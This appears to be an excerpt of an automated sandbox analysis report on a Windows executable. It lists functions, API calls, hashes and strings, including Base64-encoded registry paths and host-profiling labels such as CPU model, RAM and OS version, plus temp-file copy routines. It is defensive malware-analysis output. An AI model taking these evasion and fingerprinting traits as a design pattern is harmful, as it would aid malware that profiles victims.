Opcode ID: 416e3653b17ffb8b792b409557a66c85679e4b3f6acb14a3ced176a5403dbca9
Instruction ID: 880bf71673710542150f6ebe4433b3a02274b147136189202950d85bd83b2515
Opcode Fuzzy Hash: 416e3653b17ffb8b792b409557a66c85679e4b3f6acb14a3ced176a5403dbca9
Instruction Fuzzy Hash: A9810C71A00109AFDB00EF95DD82ADEBBB9EF48314F504536F410F72A2DB78AE558B58

Function 00416744 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 114COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C

Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==, xrefs: 004167A8
Video Info, xrefs: 00416856
CPU Model: , xrefs: 0041677E
CPU Count: , xrefs: 004167EF
UHJvY2Vzc29yTmFtZVN0cmluZw==, xrefs: 0041678C
GetRAM: , xrefs: 00416833

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: FreeString$InfoSystem
String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
API String ID: 4070941872-1038824218
Opcode ID: ea7c467229dc03554361d8e6d8d9c9cd62cd80fa8131b6840d5b8a065aae733e
Instruction ID: 93658ecaa3e0ddcdd5b33a88495a7f5ee5c1cb8a97fdfd99440d65a07410f67b
Opcode Fuzzy Hash: ea7c467229dc03554361d8e6d8d9c9cd62cd80fa8131b6840d5b8a065aae733e
Instruction Fuzzy Hash: DF411F70A1010DABDB01FFD1D882ACDBBB9EF48309F61403BF504B7296D639EA458A58

Function 00416748 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 114COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C

Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==, xrefs: 004167A8
Video Info, xrefs: 00416856
CPU Model: , xrefs: 0041677E
CPU Count: , xrefs: 004167EF
UHJvY2Vzc29yTmFtZVN0cmluZw==, xrefs: 0041678C
GetRAM: , xrefs: 00416833

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: FreeString$InfoSystem
String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
API String ID: 4070941872-1038824218
Opcode ID: c93147df2423285c54bad4dc95c4c660ec513e1a04b46fc35375619ea2add05a
Instruction ID: 0500c902736339f4efa0b07d3f9bc907855da1606bbc95f65d7857d0c3659172
Opcode Fuzzy Hash: c93147df2423285c54bad4dc95c4c660ec513e1a04b46fc35375619ea2add05a
Instruction Fuzzy Hash: 27410F70A1010DABDB01FFD1D882EDDBBB9EF48709F61403BF504B7296D639EA458A58

Function 00403368 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000), ref: 004033A1
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E), ref: 004033A7
GetStdHandle.KERNEL32(000000F5,004033F0,00000002,0041A69E,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436), ref: 004033BC
WriteFile.KERNEL32(00000000,000000F5,004033F0,00000002,0041A69E,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436), ref: 004033C2
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 004033E0

Strings

Runtime error at 00000000, xrefs: 0040339A, 004033D9
Error, xrefs: 004033D4

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
Instruction ID: 272384808b0d926620c8a29f01af81f970e1c010559b5e4fcbf7d036ebb79ccd
Opcode Fuzzy Hash: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
Instruction Fuzzy Hash: F5F09670AC03847AE620A7915DCAF9B2A5C8708F15F20867BB660744E5DBBC55C4525D

Function 00402668 Relevance: 11.4, APIs: 9, Instructions: 109COMMON

Download Yara Rule

APIs

CharNextA.USER32(00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 0040269F
CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026A9
CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026C6
CharNextA.USER32(00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026D0
CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026F9
CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402703
CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402727
CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402731

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: b7f289542d20783a7460a3fa223e5cf14214bb8296ee11ce479d6e83d044995d
Instruction ID: 5b28f76bfa796ab2381ca360e83c3cb8d2614de50686c14b6561fe7fc9f0b368
Opcode Fuzzy Hash: b7f289542d20783a7460a3fa223e5cf14214bb8296ee11ce479d6e83d044995d
Instruction Fuzzy Hash: B021E7546043951ADB31297A0AC877B6B894A5B304B68087BD0C1BB3D7D4FE4C8B832D

Function 00410E70 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 239fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00410EB4
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
DeleteFileW.KERNEL32(00000000), ref: 004110EC

Strings

.tmp, xrefs: 00410ECF
%TEMP%, xrefs: 00410EEF
, xrefs: 00411078

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: File$CopyCountDeleteTick
String ID: $%TEMP%$.tmp
API String ID: 2381671008-2792595090
Opcode ID: 25513a2d6d90f056bd5cf02fe9c1dff5265798498166ca8350b0b3102dd1fa50
Instruction ID: ef1d9ef4a41f0d536355ae74e23377fcfc6b42a5aa152db35adc264ec6821d93
Opcode Fuzzy Hash: 25513a2d6d90f056bd5cf02fe9c1dff5265798498166ca8350b0b3102dd1fa50
Instruction Fuzzy Hash: 55910B31A40109AFDB00EB95DC82EDEBBB9EF48315F104436F514F72A2DB78AE458B58

Function 0040B15C Relevance: 9.2, APIs: 6, Instructions: 198libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,00000000,00000000,0040B3C3,?,00000000,0041B0FC,00000000,0000000B,00000000,00000000,?,0040B405,00000000,0040B40F), ref: 0040B1A9
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B1AF
LoadLibraryA.KERNEL32(00000000,?,00000000,0041B0FC,00000000,0000000B,00000000,00000000,?,0040B405,00000000,0040B40F,?,00000000,0041B0FC,00000000), ref: 0040B204
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B22A
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B248
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B266

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 695678cf7ca45a9e7c8b3b2878ade717b4a60ccd5b1908c8415a47cf5bea5569
Instruction ID: 364380f0d352aef1bf1129e1f4ec87a81fdd7fa01391a9152c5138518fa9ee90
Opcode Fuzzy Hash: 695678cf7ca45a9e7c8b3b2878ade717b4a60ccd5b1908c8415a47cf5bea5569
Instruction Fuzzy Hash: 5761E375A002099BDB01EBE5C985E9EB7BDFF44304F50453AB900FB385DA78EE0587A8

Function 00401934 Relevance: 9.1, APIs: 6, Instructions: 62COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,00401A0A), ref: 00401961
LocalFree.KERNEL32(00000000,00000000,00401A0A), ref: 00401973
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401A0A), ref: 00401992
LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401A0A), ref: 004019D1
RtlLeaveCriticalSection.KERNEL32(0041C5B4,00401A11,00000000,00000000,00401A0A), ref: 004019FA
RtlDeleteCriticalSection.KERNEL32(0041C5B4,00401A11,00000000,00000000,00401A0A), ref: 00401A04

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID:
API String ID: 3782394904-0
Opcode ID: a533093bf643e2750fc0c7fb6ce1a8cee2193e72f340cc35e9b9a59fd34ff9a9
Instruction ID: f5b3729ab89c308c15893b8da70c4d7314be5901088e834fcff69d5c90a64892
Opcode Fuzzy Hash: a533093bf643e2750fc0c7fb6ce1a8cee2193e72f340cc35e9b9a59fd34ff9a9
Instruction Fuzzy Hash: F11193B17843907ED715AB669CD1B927B969745708F50807BF100BA2F1C73DA840CF5D

Function 00410BB8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 198fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00410BFD
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410E58,?,.tmp,?,?,00000000,00410DA0,?,00000000,00410E20,?,00000000), ref: 00410C79
DeleteFileW.KERNEL32(00000000), ref: 00410DBE

Strings

%TEMP%, xrefs: 00410C38
.tmp, xrefs: 00410C18

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: File$CopyCountDeleteTick
String ID: %TEMP%$.tmp
API String ID: 2381671008-3650661790
Opcode ID: 4a067d1f8ba6d400319fcf7a723a146227050b837b1c7306f0a806063b549887
Instruction ID: 978216aeb9802c3a8092c63d781cd7ad87e87d7acf88f4e3b280f19958954086
Opcode Fuzzy Hash: 4a067d1f8ba6d400319fcf7a723a146227050b837b1c7306f0a806063b549887
Instruction Fuzzy Hash: 7C710C71A00109AFDB00EBD5DC42ADEBBB9EF48318F50447AF514F7292DA78AE458A58

Function 00410900 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 197fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00410945
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410B9C,?,.tmp,?,?,00000000,00410AE8,?,00000000,00410B63,?,00000000), ref: 004109C1
DeleteFileW.KERNEL32(00000000), ref: 00410B06

Strings

.tmp, xrefs: 00410960
%TEMP%, xrefs: 00410980

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: File$CopyCountDeleteTick
String ID: %TEMP%$.tmp
API String ID: 2381671008-3650661790
Opcode ID: b6365babbb2d3b2e1b37703ec200a2ec6b79da26c3864396c2c11ec0f131d7bb
Instruction ID: 1e08b77d5c93ddd244bb37ca777f3c967e0d5c0e96542229b92685f54af29c93
Opcode Fuzzy Hash: b6365babbb2d3b2e1b37703ec200a2ec6b79da26c3864396c2c11ec0f131d7bb
Instruction Fuzzy Hash: DA710B71A04109AFDB00EF95DC41EDEBBB9EF48318F104476F514F72A2DA78AE458B58

Function 00402AC4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B19
RegCloseKey.ADVAPI32(?,00402B3C,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B2F

Strings

FPUMaskValue, xrefs: 00402B10
SOFTWARE\Borland\Delphi\RTL, xrefs: 00402ADC

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
Instruction ID: 9172d05214030136d6eeabac91fa7c92d03713ed8c8260d1a9efe939ba63eb8f
Opcode Fuzzy Hash: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
Instruction Fuzzy Hash: 04019275500308B9DB21AF908D46FAA7BB8D708700F600076BA04F66D0E7B8AA10979C

Function 00416584 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,00000000,0041660E,?,0041B0FC,?), ref: 004165AB
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004165B1

Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E

Strings

@, xrefs: 004165C7
GlobalMemoryStatusEx, xrefs: 004165A1
kernel32.dll, xrefs: 004165A6

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: AddressFreeLibraryLoadProcString
String ID: @$GlobalMemoryStatusEx$kernel32.dll
API String ID: 923276998-3878206809
Opcode ID: 85db832d693e486d1a61cee5b690b9a662077cbaa7453f9a7cd2e2dd296e1093
Instruction ID: ae4c68d41a3a4174a937c26ab83d8f0c6d254553f6270358502c1b43c0ddce29
Opcode Fuzzy Hash: 85db832d693e486d1a61cee5b690b9a662077cbaa7453f9a7cd2e2dd296e1093
Instruction Fuzzy Hash: A3018871A002086BD711EBA5DC42E8EB7BDEB88744F61413AF504B32D1E77CAD01855C

Function 00406654 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process,?,?,004066D4,?,00417330,00000000,004175F4,?,Windows : ,?,,?,EXE_PATH : ,?), ref: 00406660
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00406666
GetCurrentProcess.KERNEL32(?,00000000,kernel32.dll,IsWow64Process,?,?,004066D4,?,00417330,00000000,004175F4,?,Windows : ,?,,?), ref: 00406677

Strings

IsWow64Process, xrefs: 00406656
kernel32.dll, xrefs: 0040665B

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: AddressCurrentHandleModuleProcProcess
String ID: IsWow64Process$kernel32.dll
API String ID: 4190356694-3024904723
Opcode ID: bb90ac27b46476fccc6d3856fb06f30bc2750b404d13dc0022771fe07b4660df
Instruction ID: ba80d2391f81007aa42feea1da534082dc1adbf3711fe3d895332dec38dcedd5
Opcode Fuzzy Hash: bb90ac27b46476fccc6d3856fb06f30bc2750b404d13dc0022771fe07b4660df
Instruction Fuzzy Hash: B0E06DB12143019EEB007EB58881A3B21C89B44305F130E3EA496F21C1E97EC8A0866D

Function 00410E58 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00410EB4
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30

Strings

.tmp, xrefs: 00410ECF
%TEMP%, xrefs: 00410EEF

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: CopyCountFileTick
String ID: %TEMP%$.tmp
API String ID: 3448371392-3650661790
Opcode ID: dcbd54fc4c37fa41d1f3def047f476980ec269fdbcef2be5238ae35c760609eb
Instruction ID: 0e4f139da3bc19c2096e57fedbffea1b6a0c7ee0d64fc6893e7b5a554fe936bc
Opcode Fuzzy Hash: dcbd54fc4c37fa41d1f3def047f476980ec269fdbcef2be5238ae35c760609eb
Instruction Fuzzy Hash: D0411F31904249AEDB01EBA1D852ACDBF79EF49308F50447BF500B76A3D67CAE458A58

Function 00410E60 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00410EB4
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30

Strings

.tmp, xrefs: 00410ECF
%TEMP%, xrefs: 00410EEF

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: CopyCountFileTick
String ID: %TEMP%$.tmp
API String ID: 3448371392-3650661790
Opcode ID: b4051c86d89d16cbdd011401cb26392d540c890b59df4c5f9e00e45593a2b883
Instruction ID: 2c73a4ceecea9b7a55c8e1441bd033eb3759b1d2195d340dd4b2e4f4f6784083
Opcode Fuzzy Hash: b4051c86d89d16cbdd011401cb26392d540c890b59df4c5f9e00e45593a2b883
Instruction Fuzzy Hash: DF412131904149AFDB01FFA1D842ACDBBB9EF49318F50447BF500B36A2D67CAE458A58

Function 00410E68 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00410EB4
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30

Strings

.tmp, xrefs: 00410ECF
%TEMP%, xrefs: 00410EEF

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: CopyCountFileTick
String ID: %TEMP%$.tmp
API String ID: 3448371392-3650661790
Opcode ID: fd3ed2e0f10af06c7055efab6d8518f1a7d31fde7c18b0f8517e5c88414f77f6
Instruction ID: 3bd2312418c75e2bfd4f88111c3886d823680ea6e83d1d6075c9c2a9f0993f15
Opcode Fuzzy Hash: fd3ed2e0f10af06c7055efab6d8518f1a7d31fde7c18b0f8517e5c88414f77f6
Instruction Fuzzy Hash: 4241013190410DAEDB01FFA1D842ADDBBB9EF49318F50447BF500B36A2D77DAE458A58

Function 00410BB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 108fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00410BFD
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410E58,?,.tmp,?,?,00000000,00410DA0,?,00000000,00410E20,?,00000000), ref: 00410C79

Strings

%TEMP%, xrefs: 00410C38
.tmp, xrefs: 00410C18

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: CopyCountFileTick
String ID: %TEMP%$.tmp
API String ID: 3448371392-3650661790
Opcode ID: 3c9c793cbba2b1494e5bbcc8797dd77cc55da2a1b03f1701932884ea86e2c921
Instruction ID: ad1686550c7843c0884c0506788be05dc1fde737249d1bd281ecbc27d8194f8d
Opcode Fuzzy Hash: 3c9c793cbba2b1494e5bbcc8797dd77cc55da2a1b03f1701932884ea86e2c921
Instruction Fuzzy Hash: BF412330914109AEDB01FF91D952ADDBBBDEF49318F50447BF400B7292D77CAE458A58

Function 00410BB4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 106fileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00410BFD
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410E58,?,.tmp,?,?,00000000,00410DA0,?,00000000,00410E20,?,00000000), ref: 00410C79

Strings

%TEMP%, xrefs: 00410C38
.tmp, xrefs: 00410C18

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: CopyCountFileTick
String ID: %TEMP%$.tmp
API String ID: 3448371392-3650661790
Opcode ID: 7e65eb29c14a11400a8ae9f9535f570905a72362550addcf7d14f60cf147a02b
